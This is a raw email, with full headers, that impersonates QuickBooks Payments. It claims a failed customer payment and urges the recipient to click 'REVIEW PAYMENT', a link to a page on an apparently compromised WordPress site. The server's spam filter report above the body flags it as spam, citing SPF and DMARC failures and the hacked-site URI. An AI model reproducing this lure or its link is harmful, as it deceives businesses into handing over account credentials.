Return-Path: <qbo.alerts@secure.com>
Delivered-To: behniwal+spam@server.rnv.kpw.mybluehostin.me
Received: from server.rnv.kpw.mybluehostin.me
	by server.rnv.kpw.mybluehostin.me with LMTP
	id RBLhJSemGWoeNwAAyTkJsw
	(envelope-from <qbo.alerts@secure.com>)
	for <behniwal+spam@server.rnv.kpw.mybluehostin.me>; Fri, 29 May 2026 08:43:51 -0600
Return-path: <qbo.alerts@secure.com>
Envelope-to: info@behniwalgroup.com
Delivery-date: Fri, 29 May 2026 08:43:51 -0600
Received: from [102.130.71.100] (port=62906 helo=secure.com)
	by server.rnv.kpw.mybluehostin.me with esmtp (Exim 4.99.1)
	(envelope-from <qbo.alerts@secure.com>)
	id 1wSyRA-000000003dt-1BP0
	for info@behniwalgroup.com;
	Fri, 29 May 2026 08:43:51 -0600
From: "QuickBooks Payments" <qbo.alerts@secure.com>
To: info@behniwalgroup.com
Date: 29 May 2026 14:43:05 +0000
Message-ID: <20260529144305.74E724267910E894@secure.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Spam-Status: Yes, score=18.3
X-Spam-Score: 183
X-Spam-Bar: ++++++++++++++++++
X-Spam-Report: Spam detection software, running on the system "server.rnv.kpw.mybluehostin.me",
 has identified this incoming email as possible spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  info@behniwalgroup.com, This message is an automatic response
    message as a result of a failed payment from a customer. A customer payment
    was rejected due to incomplete billing. Help us prevent issues like this
   by reviewing your account. 
 Content analysis details:   (18.3 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: ivolucion.com]
  1.5 SPF_HELO_SOFTFAIL      SPF: HELO does not match SPF record (softfail)
  1.5 SPF_SOFTFAIL           SPF: sender does not match SPF record (softfail)
  0.0 HTML_EXTRA_CLOSE       BODY: HTML contains far too many close tags
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_MESSAGE           BODY: HTML included in message
  2.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                             [cf: 100]
  1.7 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
  2.0 PYZOR_CHECK            Listed in Pyzor
                             (https://pyzor.readthedocs.io/en/latest/)
  1.5 KAM_DMARC_QUARANTINE   DKIM has Failed or SPF has failed on the
                             message and the domain has a DMARC
                             quarantine policy
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  2.0 RDNS_NONE              Delivered to internal network by a host with no rDNS
  2.0 TO_NO_BRKTS_NORDNS_HTML To: lacks brackets and no rDNS and HTML
                             only
  3.5 URI_WP_HACKED          URI for compromised WordPress site, possible
                             malware
X-Spam-Flag: YES
Subject:    Intuit Payments Deposit

info@behniwalgroup.com,<BR><BR>This message is an automatic response messag=
e as a result of a failed payment from a customer. A customer payment was r=
ejected due to incomplete billing.<BR><BR>Help us prevent issues like this =
by reviewing your account.<BR><BR>
<A href=3D"https://chproteccionunicef.ivolucion.com/wp-content/red/wx.htm">=
REVIEW PAYMENT</A><BR>
<P><BR>Thank You,<BR>QuickBooks Payment Team</P></BODY></HTML>
